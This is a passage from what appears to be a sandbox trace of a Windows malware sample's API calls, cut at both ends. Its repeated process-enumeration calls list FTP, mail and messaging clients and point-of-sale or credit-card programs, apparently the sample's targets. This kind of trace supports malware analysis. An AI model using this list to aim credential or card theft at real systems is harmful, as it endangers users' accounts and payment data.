szExeFile="ncftp.exe")) returned 1 [0212.320] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0212.322] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0212.324] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0212.325] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0212.327] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0212.329] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0212.330] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0212.332] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0212.334] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0212.335] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0212.337] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0212.339] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0212.340] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0212.342] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0212.344] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0212.345] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0212.347] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0212.348] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0212.350] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0212.351] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0212.353] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0212.434] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0212.437] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0212.438] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0212.440] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0212.442] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0212.443] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0212.445] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0212.447] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0212.448] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0212.453] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0212.454] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0212.456] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0212.458] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.459] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0212.461] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0212.463] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0212.490] CloseHandle (hObject=0xde8) returned 1 [0212.490] Sleep (dwMilliseconds=0x64) [0212.628] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0212.705] Process32First (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.707] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0212.709] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0212.711] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.717] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0212.720] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.722] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0212.724] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0212.726] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0212.728] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.828] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.830] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0212.832] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.833] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.839] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.840] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.842] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.843] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.845] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.846] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0212.850] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0212.852] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0212.853] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.855] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.857] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0212.862] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0212.864] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0212.866] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0212.868] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.907] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0212.909] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0212.911] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.913] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0212.914] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0212.917] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0212.923] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0212.924] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0212.927] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0212.928] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0212.930] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0212.932] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0212.937] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0212.939] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0212.941] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0212.943] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0212.945] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0212.952] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 